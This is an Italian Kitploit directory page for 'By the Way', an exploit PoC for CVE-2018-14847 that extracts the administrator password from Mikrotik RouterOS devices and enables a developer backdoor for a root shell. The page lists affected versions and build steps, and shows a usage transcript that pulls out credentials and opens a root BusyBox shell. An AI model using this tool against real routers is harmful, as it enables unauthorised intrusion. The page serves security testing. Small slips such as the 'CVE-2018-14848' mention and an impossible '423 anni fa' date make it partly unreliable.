Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
routeros-CVE-2018-14847-bytheway — By the Way è un exploit che abilita una shell di root su dispositivi Mikrotik che eseguono versioni di RouterOS: | Kitploit
Strumenti/GitHubGitHub/babyshen/routeros-cve-2018-14847-bytheway
Sicurezza Sistemi EmbeddedSicurezza IoTAttacchi alle PasswordAnalisi delle VulnerabilitàExploitPenetration Testing
GitHubbabyshen/routeros-cve-2018-14847-bytheway

routeros-CVE-2018-14847-bytheway

By the Way è un exploit che abilita una shell di root su dispositivi Mikrotik che eseguono versioni di RouterOS:

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
423 anni faNon ancora revisionato

By the Way

By the Way è un exploit che consente di ottenere una shell di root su dispositivi Mikrotik con versioni RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42.0
  • Beta: 6.29rc1 - 6.43rc3

L'exploit sfrutta la vulnerabilità di path traversal CVE-2018-14847 per estrarre la password dell'amministratore e creare un pacchetto "option" per abilitare il backdoor dello sviluppatore. Dopo lo sfruttamento, l'attaccante può connettersi via Telnet o SSH usando l'utente root "devel" con la password dell'amministratore.

Mikrotik ha corretto CVE-2018-14848 ad aprile. Tuttavia, fino alla scrittura di questo PoC, non credo sia stato divulgato pubblicamente che l'attacco possa essere sfruttato per scrivere file. Puoi trovare il bollettino di Mikrotik qui:

  • https://blog.mikrotik.com/security/winbox-vulnerability.html

Nota: mentre questo exploit è scritto per Winbox, potrebbe essere portato su HTTP purché si abbiano conoscenze preliminari delle credenziali dell'amministratore.

Dipendenze

Questo PoC si basa su:

  • Boost 1.66
  • pthread
  • cmake

Istruzioni di compilazione

root@kitploit:~
mkdir build
cd build
cmake ..
make

Esempio di utilizzo

root@kitploit:~
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
Scarica lo strumento